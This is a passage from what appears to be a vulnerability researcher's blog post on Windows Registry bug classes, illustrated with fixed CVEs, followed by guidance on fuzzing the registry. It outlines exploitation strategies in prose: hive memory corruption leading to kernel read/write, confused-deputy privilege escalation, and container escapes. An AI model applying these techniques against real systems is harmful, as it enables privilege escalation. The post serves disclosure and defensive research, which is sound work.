occur within this region. So far, during my research, I have managed to find 17 hive-based memory corruption issues, which constitutes approximately 32% of all 53 vulnerabilities that have been fixed by Microsoft in security bulletins. The vast majority of them were related to just two mechanisms – reference counting security descriptors and operating on subkey lists – but there were also cases of bugs related to other types of objects. I have started using the term "inconsistent hive state", referring to any situation where the regf format state either ceases to be internally consistent or stops accurately reflecting cached copies of the same data within other kernel objects. I described one such issue here, where the _CM_BIG_DATA.Count field stops correctly corresponding to the _CM_KEY_VALUE.DataLength field for the same registry value. However, despite this specific behavior being incorrect, according to both my analysis and Microsoft's, it doesn't have any security implications for the system. In this context, the term "hive-based memory corruption" denotes a slightly narrower group of issues that not only allow reaching any inconsistent state but specifically enable overwriting valid regf structures with attacker-controlled data. The general scheme for exploiting hive-based memory corruption closely resembles the typical exploitation of any other memory corruption. The attacker's initial objective is to leverage the available primitive and manipulate memory allocations/deallocations to overwrite a specific object in a controlled manner. On modern systems, achieving this stage reliably within the heap or kernel pools can be challenging due to allocator randomization and enforced consistency checks. However, the cell allocator implemented by the Windows kernel is highly favorable for the attacker: it lacks any safeguards, and its behavior is entirely deterministic, which greatly simplifies this stage of exploit development. One could even argue that, given the properties of this allocator, virtually any memory corruption primitive within the regf format can be transformed into complete control of the hive in memory with some effort. With this assumption, let's consider what to do next. Even if we have absolute control over all the internal data of the mapped hive, we are still limited to its mapping in memory, which in itself does not give us much. The question arises as to how we can "escape" from this memory region and use hive memory corruption to overwrite something more interesting, like an arbitrary address in kernel memory (e.g., the security token of our process). First of all, it is worth noting that such an escape is not always necessary – if the attack is carried out in one of the system hives (SOFTWARE, SYSTEM, etc.), we may not need to corrupt the kernel memory at all. In this case, we could simply perform a data-only attack and modify some system configuration, grant ourselves access to important system keys, etc. However, with many bugs, attacking a highly privileged hive is not possible. Then, the other option available to the attacker is to modify one of the cells to break some invariant of the regf format, and cause a second-order side effect in the form of a kernel pool corruption. Some random ideas are:Setting too long a key name or inserting the illegal character '\' into the name,Creating a fake exit node key,Corrupting the binary structure of a security descriptor so that the internal APIs operating on them start misbehaving,Crafting a tree structure within the hive with a depth greater than the maximum allowed (512 levels of nesting),... and many, many others. However, during experiments exploring practical exploitation, I discovered an even better method that grants an attacker the ability to perform reliable arbitrary read and write operations in kernel memory—the ultimate primitive. This method exploits the behavior of 32-bit cell index values, which exhibit unusual behavior when they exceed the hive's total size. I won't elaborate on the full technique here, but for those interested, I discussed it during my presentation at the OffensiveCon conference in May 2024. The subject of exploiting hive memory corruption will be also covered in detail in its own dedicated blog post in the future.Invalid cell indexes This is a class of bugs that manifests directly when an incorrect cell index appears in an object—either in a cell within the hive or in a structure on kernel pools, like KCB. These issues can be divided into three subgroups, depending on the degree of control an attacker can gain over the cell index.Cell index 0xFFFFFFFF (HCELL_NIL) This is a special marker that indicates that a given structure member/variable of type HCELL_INDEX doesn't point to any specific cell, which is equivalent to a NULL pointer in C. There are many situations where the value 0xFFFFFFFF (in other words, -1) is used and even desired, e.g. to signal that an optional object doesn't exist and shouldn't be processed. The kernel code is prepared for such cases and correctly checks whether a given cell index is equal to this marker before operating on it. However, problems can arise when the value ends up in a place where the kernel always expects a valid index. Any mandatory field in a specific object can be potentially subject to this problem, such as the _CM_KEY_NODE.Security field, which must always point to a valid descriptor and should never be equal to -1 (other than for exit nodes). Some examples of such vulnerabilities include:CVE-2023-21772: an unexpected value of -1 being set in _CM_KEY_NODE.Security due to faulty logic in the registry virtualization code, which first freed the old descriptor and only then attempted to allocate a new one, which could fail, leaving the key without any assigned security descriptor.CVE-2023-35357: an unexpected value of -1 being set in KCB.KeyCell, because the code assumed that it was operating on a physically existing base key, while in practice it could operate on a layered key with Merge-Unbacked semantics, which does not have its own key node, but relies solely on key nodes at lower levels of the key stack.CVE-2023-35358: another case of an unexpected value of -1 being set in KCB.KeyCell, while the kernel expected that at least one key in the given key node stack would have an allocated key node object. The source of the problem here was incorrect integration of transactions and differencing hives. When such a problem occurs, it always manifests by the value -1 being passed as the cell index to the HvpGetCellPaged function. For decades, this function completely trusted its parameters, assuming that the input cell index would always be within the bounds of the given hive. Consequently, calling HvpGetCellPaged with a cell index of 0xFFFFFFFF would result in the execution of the following code: _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {   _HMAP_ENTRY *Entry = &Hive->Storage[1].Map->Directory[0x3FF]->Table[0x1FF];   return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + 0xFFF + 4; } In other words, the function would refer to the Volatile (1) map cell, and within it, to the last element of the Directory and then the Table arrays. Considering the "small dir" optimization described in post #6, it becomes clear that this cell map walk could result in an out-of-bounds memory access within the kernel pools (beyond the boundaries of the _CMHIVE structure). Personally, I haven't tried to transform this primitive into anything more useful, but it seems evident that with some control over the kernel memory around _CMHIVE, it should theoretically be possible to get the HvpGetCellPaged function to return any address chosen by the attacker. Further exploitation prospects would largely depend on the subsequent operations that would be performed on such a fake cell, and the extent to which a local user could influence them. In summary, I've always considered these types of bugs as "exploitable on paper, but quite difficult to exploit in practice." Ultimately, none of this matters much, because it seems that Microsoft noticed a trend in these vulnerabilities and, in July 2023, added a special condition to the HvpGetCellFlat and HvpGetCellPaged functions:   if (Index == HCELL_NIL) {     KeBugCheckEx(REGISTRY_ERROR, 0x32, 1, Hive, 0xFFFFFFFF);  } This basically means that the specific case of index -1 has been completely mitigated, since rather than allowing any chance of exploitation, the system now immediately shuts down with a Blue Screen of Death. As a result, the bug class no longer has any security implications. However, I do feel a bit disappointed – if Microsoft deemed the check sufficiently important to add to the code, they could have made it just a tiny bit stronger, for example:   if ((Index & 0x7FFFFFFF) >= Hive->Storage[Index >> 31].Length) {     KeBugCheckEx(...);   } The above check would reject all cell indexes exceeding the length of the corresponding storage type, and it is exactly what the HvpReleaseCellPaged function currently does. Checking this slightly stronger condition in one fell swoop would handle invalid indexes of -1 and completely mitigate the previously mentioned technique of out-of-bounds cell indexes. While not introduced yet, I still secretly hope that it will happen one day... 🙂Dangling (out-of-date) cell indexes Another group of vulnerabilities related to cell indexes are cases where, after a cell is freed, its index remains in an active cell within the registry. Simply put, these are just the cell-specific use-after-free conditions, and so the category very closely overlaps with the previously described hive-based memory corruption. Notable examples of such bugs include:CVE-2022-37988: Caused by the internal HvReallocateCell function potentially failing when shrinking an existing cell, which its caller assumed was impossible.CVE-2023-23420: A bug in the transactional key rename operation could lead to a dangling cell index in a key's subkey list, pointing to a freed key node.CVE-2024-26182: Caused by mishandling a partial success situation where an internal function might successfully perform some operations on the hive (reallocate existing subkey lists) but ultimately return an error code, causing the caller to skip updating the _CM_KEY_NODE.SubKeyLists[...] field accordingly.All use-after-free vulnerabilities in security descriptors due to incorrect reference counting: CVE-2022-34707, CVE-2023-28248, CVE-2023-35356, CVE-2023-35382, CVE-2023-38139, and CVE-2024-43641. In general, UAF bugs within the hive are powerful primitives that can typically be exploited to achieve total control over the hive's internal data. The fact that both exploits I wrote to demonstrate practical exploitation of hive memory corruption vulnerabilities fall into this category (CVE-2022-34707, CVE-2023-23420) can serve as anecdotal evidence of this statement.Fully controlled/arbitrary cell indexes The last type of issues where cell indexes play a major role are situations in which the user somehow obtains full control over the entire 32-bit index value, which is then referenced as a valid cell by the kernel. Notably, this is not about some second-order effect of hive memory corruption, but vulnerabilities where this primitive is the root cause of the problem. Such situations happen relatively rarely, but there have been at least two such cases in the past: CVE-2022-34708: missing verification of the _CM_KEY_SECURITY.Blink field in the CmpValidateHiveSecurityDescriptors function for the root security descriptor in the hive,CVE-2023-35356: referencing the _CM_KEY_NODE.ValueList.List field in a predefined key, in which the ValueList structure has completely different semantics, and its List field can be set to an arbitrary value. Given that the correctness of cell indexes is a fairly obvious requirement known to Microsoft kernel developers, they pay close attention to verifying them thoroughly. For this reason, I think that the chance we will have many more such bugs in the future is slim. As for their exploitation, they may seem similar in nature to the way hive memory corruption can be exploited with out-of-bounds cell indexes, but in fact, these are two different scenarios. With hive-based memory corruption, we can dynamically change the value of a cell index multiple times as needed, and here, we would only have one specific 32-bit value at our disposal. If, in a hypothetical vulnerability, some interesting operations were performed on such a controlled index, I would probably still reduce the problem to the typical UAF case, try to obtain full binary control over the hive, and continue from there.Low-level information disclosure (memory, pointers) Since the registry code is written in C and operates with kernel privileges, and additionally has not yet been completely rewritten to use zeroing ExAllocatePool functions, it is natural that it may be vulnerable to memory disclosure issues when copying output data to user-mode. The most canonical example of such a bug was CVE-2023-38140, where the VrpPostEnumerateKey function (one of the sub-handlers of the VRegDriver registry callback) allocated a buffer on kernel pools with a user-controlled length, filled it with some amount of data – potentially less than the buffer size – and then copied the entire buffer back to user mode, including uninitialized bytes at the end of the allocation. However, besides this typical memory disclosure scenario, it is worth noting two more things in the context of the registry. One of them is that, as we know, the registry operates not only on memory but also on various files on disk, and therefore the filesystem becomes another type of data sink where data leakage can also occur. And so, for example, in CVE-2022-35768, kernel pool memory could be disclosed directly to the hive file due to an out-of-bounds read vulnerability, and in CVE-2023-28271, both uninitialized data and various kernel-mode pointers were leaked to KTM transaction log files. The second interesting observation is that the registry implementation does not have to be solely the source of the data leak, but can also be just a medium through which it happens. There is a certain group of keys and values that are readable by ordinary users and initialized with binary data by the kernel and drivers using ZwSetValueKey and similar functions. Therefore, there is a risk that some uninitialized data may leak through this channel, and indeed during my Bochspwn Reloaded research in 2018, I identified several instances of such leaks, such as CVE-2018-0898, CVE-2018-0899, and CVE-2018-0900.Broken security guarantees, API contracts and common sense assumptions Besides maintaining internal consistency and being free of low-level bugs, it's also important that the registry behaves logically and predictably, even under unusual conditions. It must adhere to the overall security model of Windows NT, operate in accordance with its public documentation, and behave in a way that aligns with common sense expectations. Failure to do so could result in various problems in the client software that interacts with it, but identifying such deviations from expected behavior can be challenging, as it requires deep understanding of the interface's high-level principles and the practical implications of violating them. In the following subsections, I will discuss a few examples of issues where the registry's behavior was inconsistent with documentation, system architecture, or common sense.Security access rights enforcement The registry implementation must enforce security checks, meaning it must verify appropriate access rights to a key when opening it, and then again when performing specific operations on the obtained handle. Generally, the registry manages this well in most cases. However, there were two bugs in the past that allowed a local user to perform certain operations that they theoretically didn't have sufficient permissions for: CVE-2023-21750: Due to a logic bug in the CmKeyBodyRemapToVirtual function (related to registry virtualization), it was possible to delete certain keys within the HKLM\Software hive with only KEY_READ and KEY_SET_VALUE rights, without the normally required DELETE right.CVE-2023-36404: In this case, it was possible to gain access to the values of certain registry keys despite lacking appropriate rights. The attack itself was complex and required specific circumstances: loading a differencing hive overlaid on a system hive with a specially crafted key structure, and then having a system component create a secret key in that system hive. Because of the fact that the handle to the layered key would be opened earlier (and the security access check would be performed at that point in time), creating a new key at a lower level with more restricted permissions wouldn't be considered later, leading to potential information disclosure. As shown, both these bugs were directly related to incorrect or missing permissions verification, but they weren't particularly attractive in terms of practical attacks. A much more appealing bug was CVE-2019-0881, discovered in registry virtualization a few years earlier by James Forshaw. That vulnerability allowed unprivileged users to read every registry value in the system regardless of the user's privileges, which is about as powerful as a registry infoleak can get.Confused deputy problems with predefined keys Predefined keys probably don't need any further introduction at this point in the series. In this specific case of the confused deputy problem, the bug report for CVE-2023-35633 captures the essence of the issue well: if a local attacker had binary control over a hive, they could cause the use of an API like RegOpenKeyExW on any key within that hive to return one of the predefined pseudo-handles like HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER, etc., instead of a normal handle to that key. This behavior was undocumented and unexpected for developers using registry in their code. Unsurprisingly, finding a privileged process that did something interesting on a user-controlled hive wasn't that hard, and it turned out that there was indeed a service in Windows that opened a key inside the HKCU of each logged-in user, and recursively set permissive access rights on that key. By abusing predefined handles, it was possible to redirect the operation and grant ourselves full access to one of the global keys in the system, leading to a fairly straightforward privilege escalation. If you are interested in learning more about the bug and its practical exploitation, please refer to my Windows Registry Deja Vu: The Return of Confused Deputies presentation from CONFidence 2024. In many ways, this attack was a resurrection of a similar confused deputy problem, CVE-2010-0237, which I had discovered together with Gynvael Coldwind. The main difference was that at that time, the redirection of access to keys was achieved via symbolic links, a more obvious and widely known mechanism.Atomicity of KTM transactions The main feature of any transaction implementation is that it should guarantee atomicity – that is, either apply all changes being part of the transaction, or none of them. Imagine my surprise then, when I discovered that the registry transaction implementation integrated with the KTM did not guarantee atomicity at all, but merely tried really hard to maintain it. The main problem was that it wasn't designed to handle OOM errors (for example, when a hive was completely full) and, as a result, when such a problem occurred in the middle of committing a transaction, there was no good way to reverse the changes already applied. The Configuration Manager falsely returned a success code to the caller, while retrying to commit the remaining part of the transaction every 30 seconds, hoping that some space would free up in the registry in the meantime, and the operations would eventually succeed. This type of behavior obviously contradicted both the documentation and common sense about how transactions should work. I reported this issue as CVE-2023-32019, and Microsoft fixed it by completely removing a large part of the code that implemented this functionality, as it was simply impossible to fix correctly without completely redesigning it from scratch. Fortunately, in Windows 10, an alternative transaction implementation for the registry called lightweight transactions was introduced, which was designed correctly and did not have the same problem. As a result, a decision was made to internally redirect the handling of KTM transactions within the Windows kernel to the same engine that is responsible for lightweight transactions.Containerized registry escapes The general goal of differencing hives and layered keys is to implement registry containerization. This mechanism creates an isolated registry view for a specific group of processes, without direct access to the host registry (a sort of "chroot" for the Windows registry). Unfortunately, there isn't much official documentation on this topic, and it's particularly difficult to find information on whether this type of containerization is a Microsoft-supported security boundary that warrants fixes in the monthly security bulletins. I think it is reasonable to expect that since the mechanism is used to isolate the registry in well supported use-cases (such as running Docker containers), it should ideally not be trivial to bypass, but I was unable to find any official statement to support or refute this assumption. When I looked further into it, I discovered that the redirection of registry calls within containerized environments was managed by registry callbacks, specifically one called VrpRegistryCallback. While callbacks do indeed seem well suited for this purpose, the devil is in the details – specifically, error handling. I found at least two ways a containerized application could trigger an error during the execution of the internal VrpPreOpenOrCreate/VrpPostOpenOrCreate handlers. This resulted in exiting the callback prematurely while an important part of the redirection logic still hadn't been executed, and consequently led to the process gaining access to the host's registry view. Additionally, I found that another logical bug allowed access to the host's registry through differencing hives associated with other active containers in the system. As I mentioned, I wasn't entirely clear on the state of Microsoft's support for this mechanism, but luckily I didn't have to wonder for too long. It turned out that James Forshaw had a similar dilemma and managed to reach an understanding with the vendor on the matter, which he described in his blog post. After much back and forth with various people in MSRC a decision was made. If a container escape works from a non-administrator user, basically if you can access resources outside of the container, then it would be considered a privilege escalation and therefore serviceable. [...] Microsoft has not changed the MSRC servicing criteria at the time of writing. However, they will consider fixing any issue which on the surface seems to escape a Windows Server Container but doesn’t require administrator privileges. It will be classed as an elevation of privilege. Eventually, I reported all three bugs in one report, and Microsoft fixed them shortly after as CVE-2023-36576. I particularly like the first issue described in the report (the bug in VrpBuildKeyPath), as it makes a very interesting example of how a theoretically low-level issue like a 16-bit integer overflow can have the high-level consequences of a container escape, without any memory corruption being involved.Adherence to official key and value name length limits The constraints on the length of key and value names are quite simple. Microsoft defines the maximum values on a dedicated documentation page called Registry Element Size Limits: Registry element Size limit Key name 255 characters. The key name includes the absolute path of the key in the registry, always starting at a base key, for example, HKEY_LOCAL_MACHINE. Value name 16,383 characters. Windows 2000: 260 ANSI characters or 16,383 Unicode characters. Admittedly, the way this is worded is quite confusing, and I think it would be better if the information in the second column simply ended after the first period. As it stands, the explanation for "key name" seems to suggest that the 255-character limit applies to the entire key path relative to the top-level key. In reality, the limit of 255 (or to be precise, 256) characters applies to the individual name of each registry key, and value names are indeed limited to 16,383 characters. These assumptions are the basis for the entire registry code. Despite these being fundamental and documented values, it might be surprising that the requirements weren't correctly verified in the hive loading code until October 2022. Specifically, it was possible to load a hive containing a key with a name of up to 1040 characters. Furthermore, the length of a value's name wasn't checked at all, meaning it could consist of up to 65535 characters, which is the maximum value of the uint16 type representing its length. In both cases, it was possible to exceed the theoretical limits set by the documentation by more than four times. I reported these bugs as part of the CVE-2022-37991 report. On a default Windows installation, I found a way to potentially exploit (or at least trigger a reproducible crash) the missing check for the value name length, but I couldn't demonstrate the consequences of an overly long key name. Nevertheless, I'm convinced that with a bit more research, one could find an application or driver implementing a registry callback that assumes key names cannot be longer than 255 characters, leading to a buffer overflow or other memory corruption. This example clearly shows that even the official documentation cannot be trusted, and all assumptions, even the most fundamental ones, must be verified directly in the code during vulnerability research.Creation of stable keys under volatile ones Another rational behavior of the registry is that it doesn't allow you to create Stable keys under Volatile parent keys. This makes sense, as stable keys are stored on disk and persist through hive unload and system reboot, whereas volatile keys only exist in memory and vanish when the hive is unloaded. Consequently, a stable key under a volatile one wouldn't be practical, as its parent would disappear after a restart, severing its path to the registry tree root, causing the stable key to disappear as well. Therefore, under normal conditions, creating such a key is impossible, and any attempts to do so results in the  ERROR_CHILD_MUST_BE_VOLATILE error being returned to the caller. While there's no official mention of this in the documentation (except for a brief description of the error code), Raymond Chen addressed it on his blog, providing at least some documentation of this behavior. During my research, I discovered two ways to bypass this requirement and create stable keys under volatile ones. These were issues CVE-2023-21748 and CVE-2024-26173, where the first one was related to registry virtualization, and the second to transaction support. Interestingly, in both of these cases, it was clear that a certain invariant in the registry design was being broken, but it was less clear whether this could have any real consequences for system security. After spending some time on analysis, I came to the conclusion that there was at least a theoretical chance of some security impact, due to the fact that security descriptors of volatile keys are not linked together into a global linked list in the same way stable security descriptors are. Long story short, if later in time some other stable keys in the hive started to share the security descriptor of the stable-under-volatile one, then their security would become invalidated and forcibly reset to their parent's descriptor on the next system reboot, violating the security model of the registry. Microsoft apparently shared my assessment of the situation, as they decided to fix both bugs as part of a security bulletin. Still, this is an interesting illustration of the complexity of the registry – sometimes finding an anomaly in the kernel logic can generate some kind of inconsistent state, but its implications might not be clear without further, detailed analysis.Arbitrary key existence information leak If someone were to ask me whether an unprivileged user should be able to check for the existence of a registry key without having any access rights to that key or its parent in a secure operating system, I would say absolutely not. However, this is possible on Windows, because the code responsible for opening keys first performs a full path lookup, and only then checks the access rights. This allows for differentiation between existing keys (return value STATUS_ACCESS_DENIED) and non-existing keys (return value STATUS_OBJECT_NAME_NOT_FOUND). After discovering this behavior, I decided to report it to Microsoft in December 2023. The vendor's response was that it is indeed a bug, but its severity is not high enough to be fixed as an official vulnerability. I somewhat understand this interpretation, as the amount of information that can be disclosed in this way is quite low (i.e. limited configuration elements of other users), and fixing the issue would probably involve significant code refactoring and a potential performance decrease.  It's also difficult to say whether this type of boundary is properly defensible, because after one fix it might turn out that there are many other ways to leak this type of information. Therefore, the technique described in my report still works at the time of writing this blog post.Miscellaneous In addition to the bug classes mentioned above, there are also many other types of issues that can occur in the registry. I certainly won't be able to name them all, but briefly, here are a few more primitives that come to mind when I think about registry vulnerabilities:Low-severity security bugs: These include local DoS issues such as NULL pointer dereferences, infinite loops, direct KeBugCheckEx calls, as well as classic memory leaks, low-quality out-of-bounds reads, and others. The details of a number of such bugs can be found in the p0tools/WinRegLowSeverityBugs repository on GitHub.Real, but unexploitable bugs: These are bugs that are present in the code, but cannot be exploited due to some mitigating factors. Examples include bugs in the CmpComputeComponentHashes and HvCheckBin internal functions.Memory management bugs: These bugs are specifically related to the management of hive section views in the context of the Registry process. This especially applies to situations where the hive is loaded from a file on a removable drive, from a remote SMB share, or from a file on a local disk but with unusual semantics (e.g., a placeholder file created through the Cloud Filter API). Two examples of this vulnerability type are CVE-2024-43452 and CVE-2024-49114.Unusual primitives: These are various non standard primitives that are simply too difficult to categorize, such as CVE-2024-26177, CVE-2024-26178, WinRegLowSeverityBugs #19, or WinRegLowSeverityBugs #20.Fuzzing considerations Due to the Windows Registry's strictly defined format (regf) and interface (around a dozen specific syscalls that operate on it), automated testing in the form of fuzzing is certainly possible. We are dealing with kernel code here, so it's not as simple as taking any library that parses a file format and connecting it to a standard fuzzer like AFL++, Honggfuzz, or Jackalope – registry fuzzing requires a bit more work. But, in its simplest form, it could consist of just a few trivial steps: finding an existing regf file, writing a bit-flipping mutator, writing a short harness that loads the hive using RegLoadAppKey, and then running those two programs in an infinite loop and waiting for the system to crash. It's hard to argue that this isn't some form of fuzzing, and in many cases, these kinds of methods are perfectly sufficient for finding plenty of serious vulnerabilities. After all, my entire months-long research project started with this fairly primitive fuzzing, which did more or less what I described above, with just a few additional improvements:Fixing the hash in the regf header,Performing a few simple operations on the hive, like enumerating subkeys and values,Running on multiple machines at once,Collecting code coverage information from the Windows kernel. Despite my best efforts, this type of fuzzing was only able to find one vulnerability (CVE-2022-35768), compared to over 50 that I later discovered manually by analyzing the Windows kernel code myself. This ratio doesn't speak well for fuzzing, and it stems from the fact that the registry isn't as simple a target for automated testing as it might seem. On the contrary, each individual element of such fuzzing is quite difficult and requires a large time investment if one wishes to do it effectively. In the following sections, I'll focus on each of these components (corpus, mutator, harness and bug detection), pointing out what I think could be improved in them compared to the most basic version discussed above.Initial corpus The first issue a potential researcher may encounter is gathering an initial corpus of input files. Sure, one can typically find dozens of regf files even on a clean Windows installation, but the problem is that they are all very simple and don't exhibit characteristics interesting from a fuzzing perspective. In particular:All of these hives are generated by the same registry implementation, which means that their state is limited to the set of states produced by Windows, and not the wider set of states accepted by the hive loader.The data structures within them are practically never even close to the limits imposed by the format itself, for example:The maximum length of key and value names are 256 and 16,383 characters, but most names in standard hives are shorter than 30 characters.The maximum nesting depth of the tree is 512 levels, but in most hives, the nesting doesn't exceed 10 levels.The maximum number of keys and values in a hive is limited only by the maximum space of 2 GiB, but standard hives usually include at most a few subkeys and associated values – certainly not the quantities that could trigger any real bugs in the code. This means that gathering a good initial corpus of hives is very difficult, especially considering that there aren't many interesting regf hives available on the Internet, either. The other options are as follows: either simply accept the poor starting corpus and hope that these shortcomings will be made up for by a good mutator (see next section), especially if combined with coverage-based fuzzing, or try to generate a better one yourself by writing a generator based on one of the existing interfaces (the kernel registry implementation, the user-mode Offline Registry Library, or some other open-source library). As a last resort, you could also write your own regf file generator from scratch, where you would have full control over every aspect of the format and could introduce any variance at any level of abstraction. The last approach is certainly the most ambitious and time-consuming, but could potentially yield the best results.Mutator Overall, the issue with the mutator is very similar to the issue with the initial corpus. In both cases, the goal is to generate the most "interesting" regf files possible, according to some metric. However, in this case, we can no longer ignore the problem and hope for the best. If the mutator doesn't introduce any high-quality changes to the input file, nothing else will. There is no way around it – we have to figure out how to make our mutator test as much state of the registry implementation as possible. For simplicity, let's assume the simplest possible mutator that randomly selects N bits in the input data and flips them, and/or selects some M bytes and replaces them with other random values. Let's consider for a moment what logical types of changes this approach can introduce to the hive structure:Enable or disable some flags, e.g., in the _CM_KEY_NODE.Flags field,Change the value of a field indicating the length of an array or list, e.g., _CM_KEY_NODE.NameLength, _CM_KEY_VALUE.DataLength, or a 32-bit field indicating the size of a given cell,Slightly change the name of a key or value, or the data in the backing cell of a value,Corrupt a value sanitized during hive loading, causing the object to be removed from the hive during the self-healing process,Change the value of some cell index, usually to an incorrect value,Change/corrupt the binary representation of a security descriptor in some way. This may seem like a broad range of changes, but in fact, each of them is very local and uncoordinated with other modifications in the file. This can be compared to binary mutation of an XML file – sometimes we may corrupt/remove some critical tag or attribute, or even change some textually encoded number to another valid number – but in general, we should not expect any interesting structural changes to occur, such as changing the order of objects, adding/removing objects, duplicating objects, etc. Hives are very similar in nature. For example, it is possible to set the KEY_SYM_LINK flag in a key node by pure chance, but for this key to actually become a valid symlink, it is also necessary to remove all its current values, ​​and add a new value named "SymbolicLinkValue" of type REG_LINK containing a fully qualified registry path. With a mutator operating on single bits and bytes, the probability of this happening is effectively zero. In my opinion, a dedicated regf mutator would need to operate simultaneously on four levels of abstraction, in order to be able to create the conditions necessary for triggering most bugs:On the high-level structure of a hive, where only logical objects matter: keys, values, security descriptors, and the relationships between them. Mutations could involve adding, removing, copying, moving, and changing the internal properties of these three main object types. These mutations should generally conform to the regf format, but sometimes push the boundaries by testing edge cases like handling long names, a large number of subkeys or values, or a deeply nested tree.On the level of specific cell types, which can represent the same information in many different ways. This primarily refers to all kinds of lists that connect higher-level objects, particularly subkey lists (index leaves, fast leaves, hash leaves, root indexes), value lists, and linked lists of security descriptors. Where permitted by the format (or sometimes even in violation of the format), the internal representation of these lists could be changed, and its elements could be rearranged or duplicated.On the level of cell and bin layout: taking the entire set of interconnected cells as input, they could be rearranged in different orders, in bins of different sizes, sometimes interspersed with empty (or artificially allocated) cells or bins. This could be used to find vulnerabilities specifically related to hive memory management, and also to potentially facilitate triggering/reproducing hive memory corruption issues more reliably.On the level of bits and bytes: although this technique is not very effective on its own, it can complement more intelligent mutations. You never know what additional problems can be revealed through completely random changes that may not have been anticipated when implementing the previous ideas. The only caveat is to be careful with the number of those bit flips, as too many of them could negate the overall improvement achieved through higher-level mutations. As you can see, developing a good mutator requires some consideration of the hive at many levels, and would likely be a long and tedious process. The question also remains whether the time spent in this way would be worth it compared to the effects that can be achieved through manual code analysis. This is an open question, but as a fan of the registry, I would be thrilled to see an open-source project equivalent to fonttools for regf files, i.e., a library that allows "decompiling" hives into XML (or similar) and enables efficient operation on it. One can only dream... 🙂 Finally, I would like to point out that regf files are not the only type of input for which a dedicated mutator could be created. As I've already mentioned before, there are also accompanying .LOG1/.LOG2 and .blf/.regtrans-ms files, responsible for the atomicity of individual registry operations and KTM transactions, respectively. Both types of files may not be as complex as the core hive files, but mutating them might still be worthwhile, especially since some bugs have been historically found in their handling. Additionally, other registry operations performed by the harness could also be treated as part of the input. This would resemble an architecture similar to Syzkaller, and storing registry call sequences as part of the corpus would require writing a special grammar-based mutator, or possibly adapting an existing one.Harness While having a good mutator for registry-related files is a great start, the vast majority of potential vulnerabilities do not manifest when loading a malformed hive, but only during further operations on said hive. These bugs are mainly related to some complex and unexpected state that has arisen in the registry, and triggering it usually requires a very specific sequence of system calls. Therefore, a well-constructed harness should support a broad range of registry operations in order to effectively test as many different internal states as possible. In particular, it should:Perform all standard operations on keys (opening, creating, deleting, renaming, enumerating, setting properties, querying properties, setting notifications), values (setting, deleting, enumerating, querying data) and security descriptors (querying keys for security descriptors, setting new descriptors). For the best result, it would be preferable to randomize the values of their arguments (to a reasonable extent), as well as the order in which the operations are performed.Support a  "deferred close" mechanism, i.e. instead of closing key handles immediately, maintain a certain cache of such handles to refer to them at a later point in time. In particular, the idea is to sometimes perform an operation on a key that has been deleted, renamed or had its hive unloaded, in order to trigger potential bugs related to object lifetime or the verification that a given key actually exists prior to performing any action on it.Load input hives with different flags. The main point here is to load hives with and without the REG_APP_HIVE flag, as the differences in the treatment of app hives and regular hives are sometimes significant enough to warrant testing both scenarios. Randomizing the states of the other few flags that can take arbitrary values could also yield positive results.Support the registry virtualization mechanism, which can consist of several components:Periodically enabling and disabling virtualization for the current process using the SetTokenInformation(TokenVirtualizationEnabled) call,Setting various virtualization flags for individual keys using the NtSetInformationKey(KeySetVirtualizationInformation) call,Creating an additional key structure under the HKU\_Classes\VirtualStore tree to exercise the mechanism of key replication / merging state in "query" type operations (e.g. in enumeration of the values of a virtualized key).Use transactions, both KTM and lightweight. In particular, it would be useful to mix non-transactional calls with transactional ones, as well as transactional calls within different transactions. This way, we would be able to the code paths responsible for making sure that no two transactions collide with each other, and that non-transactional operations always roll back the entire transactional state before making any changes to the registry. It would also be beneficial if some of these transactions were committed and some rolled back, to test as much of their implementation as possible.Support layered keys. For many registry operations, the layered key implementation is completely different than the standard one, and almost always more complicated. However, adding differencing hive support to the fuzzer wouldn't be trivial, as it would require additional communication with VRegDriver to load/unload the hive. It would also require making some fundamental decisions: which hive(s) do we overlay our input hive on top of? Should we keep pairs of hives in the corpus and overlay them one on top of the other, in order to control the properties of all the keys on the layered key stack? Do we limit ourselves to a key stack of two elements, or create more complicated stacks consisting of three or more hives? These are all open questions to which I don't know the answer, but I am sure that implementing some form of layered key support would positively affect the number of vulnerabilities that could be found this way.Potentially support multi-threading and execute the harness logic in multiple threads at once, allowing it to trigger potential race conditions. The downside of this idea is that unless we run the fuzzing in some special environment, it would probably be non-deterministic, making timing-related bugs difficult to reproduce. The final consideration for harness development is the prevalence of registry issues caused by improper error handling, particularly cell allocator out-of-memory errors. A potential harness feature could be to artificially trigger these circumstances, perhaps by aggressively filling almost all of the 2 GiB stable/volatile space, causing HvAllocateCell/HvReallocateCell functions to fail. However, this approach would waste significant disk space and memory, and substantially slow down fuzzing, so the net benefit is unclear. Alternative options include hooking the allocator functions to make them fail for a specific fraction of requests (e.g., using DTrace), or applying a runtime kernel modification to reduce the maximum hive space size from 2 GiB to some smaller value (e.g., 16 MiB). These ideas are purely theoretical and would require further testing.Bug detection Alongside a good initial corpus, mutator and harness, the fourth and final pillar of an effective fuzzing session is bug detection. After all, what good is it to generate an interesting sample and trigger a problem with a series of complicated calls, if we don't even notice the bug occurring? In typical user-mode fuzzing, bug detection is assisted by tools such as AddressSanitizer, which are integrated into the build process and add extra instrumentation to the binary to enable the detection of all invalid memory references taking place in the code. In the case of the Windows kernel, a similar role is played by the Special Pool, which isolates individual allocations on kernel pools to maximize the probability of a crash when an out-of-bounds access/use-after-free condition occurs. Additionally, it may also be beneficial to enable the Low Resources Simulation mechanism, which can cause some pool allocations to fail and thus potentially help in triggering bugs related to handling OOM conditions. The challenge with the registry lies in the fact that most bugs don't stem from memory corruption within the kernel pools. Typically, we're dealing with either hive-based memory corruption or its early stage—an inconsistent state within the registry that violates a crucial invariant. Reaching memory corruption in such a scenario necessitates additional steps from an attacker. For instance, consider a situation where the reference count of a security descriptor is decremented without removing a reference to it in a key node. To trigger a system bugcheck, one would need to remove all other references to that security descriptor (e.g., by deleting keys), overwrite it with different data (e.g., by setting a value), and then perform an operation on it or one of its adjacent descriptors that would lead to a system crash. Each extra step significantly decreases the likelihood of achieving the desired state. The fact that cells have their own allocator further hinders fuzzing, as there's no equivalent of the Special Pool available for it. Here are a few ideas for addressing the problem, some more realistic than others:If we had a special library capable of breaking down regf files at various levels of abstraction, we could have the mutator create the input hive in a way that maximizes the chances of a crash if a bug occurs during a cell operation. For example, we could assign each key a separate security descriptor with refcount=1 (which should make triggering UAFs easier) and place each 